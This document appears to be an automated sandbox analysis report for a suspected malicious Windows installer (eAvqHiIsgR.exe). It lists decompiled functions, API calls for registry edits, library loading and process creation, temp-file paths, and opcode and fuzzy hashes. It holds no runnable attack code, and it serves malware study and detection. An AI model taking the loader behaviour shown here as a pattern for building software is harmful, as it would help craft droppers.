Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

Function 72A416DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 72A41A98: GlobalFree.KERNEL32(?), ref: 72A41D09
Part of subcall function 72A41A98: GlobalFree.KERNEL32(?), ref: 72A41D0E
Part of subcall function 72A41A98: GlobalFree.KERNEL32(?), ref: 72A41D13

GlobalFree.KERNEL32(00000000), ref: 72A41786
FreeLibrary.KERNEL32(?), ref: 72A41809
GlobalFree.KERNEL32(00000000), ref: 72A4182E

Part of subcall function 72A422AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72A422E0

Part of subcall function 72A426B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72A41757,00000000), ref: 72A42782

Part of subcall function 72A4156B: wsprintfA.USER32 ref: 72A41599

Strings

, xrefs: 72A4180F

Memory Dump Source

Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true

Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 42c27de687661636f0957659b19b39f875fb787104b1478d4847bdf60cd98af8
Instruction ID: 26ac35176fd03ecb437a920a7a6a7c97d193dd42d422202b5025ee7bb55ed4c8
Opcode Fuzzy Hash: 42c27de687661636f0957659b19b39f875fb787104b1478d4847bdf60cd98af8
Instruction Fuzzy Hash: 30416F72540204DBCB019B6CDAC4B963BECBB08328F64B469E9079A09EDF75D546CBA1

Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

Function 00402476 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000023,00000011,00000002), ref: 004024C1
RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 00402501
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 004025E5

Strings

C:\Users\user\AppData\Local\Temp\nso2EAF.tmp, xrefs: 004024B2, 004024D4, 004024EB, 004024F6

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nso2EAF.tmp
API String ID: 2655323295-1291088236
Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28

Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,759223A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,759223A0), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
Opcode Fuzzy Hash: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\tranchet\Trykmaalere, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\tranchet\Trykmaalere
API String ID: 1892508949-1178395610
Opcode ID: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
Opcode Fuzzy Hash: 6f48d1f4569c46ba79332d618e5f2744522d6a7c4d3c9928c8ba38f6ac20f072
Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E

Function 00405FDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,0042A070,?,?,?,00000002,Call,?,00406293,80000002), ref: 00406024
RegCloseKey.KERNELBASE(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,0042A070), ref: 0040602F

Strings

Call, xrefs: 00405FE1, 00406015

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4

Function 00405796 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
CloseHandle.KERNEL32(?), ref: 004057CC

Strings

Error launching installer, xrefs: 004057A9

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction ID: 4c3df7556a0b034395016ee82922b733160aa74f7bc511f6187c6ec266d632ef
Opcode Fuzzy Hash: de0eed9ff358aa0300570f89c8dde483a6f9bec5cddf33796de70880124f880f
Instruction Fuzzy Hash: 4DE0B6B4600209BFEB109BA4ED89F7F7BBCEB04604F504525BE59F2290E67498199A7C

Function 00402588 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025CD
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
Instruction ID: ee0fd62ac357f9525b55a30647733f0e3798e9bebba0400de635a53faed38b57
Opcode Fuzzy Hash: 7b99555fd6f8dae37ea9679ab54f9e8123d87756e6997b06f3b56209368cff92
Instruction Fuzzy Hash: 22017C71604204FFE7219F549E99ABF7ABCEF40358F20403EF505A61C0DAB88A459629

Function 00402516 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EAF.tmp,00000000,00000011,00000002), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D

Function 00402421 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
RegCloseKey.ADVAPI32(00000000), ref: 0040244B

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE

Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EE3
EnableWindow.USER32(00000000,00000000), ref: 00401EEE

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69

Function 00406500 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
GetProcAddress.KERNEL32(00000000,?), ref: 0040652D

Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D

Function 00405C90 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6

Memory Dump Source

Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
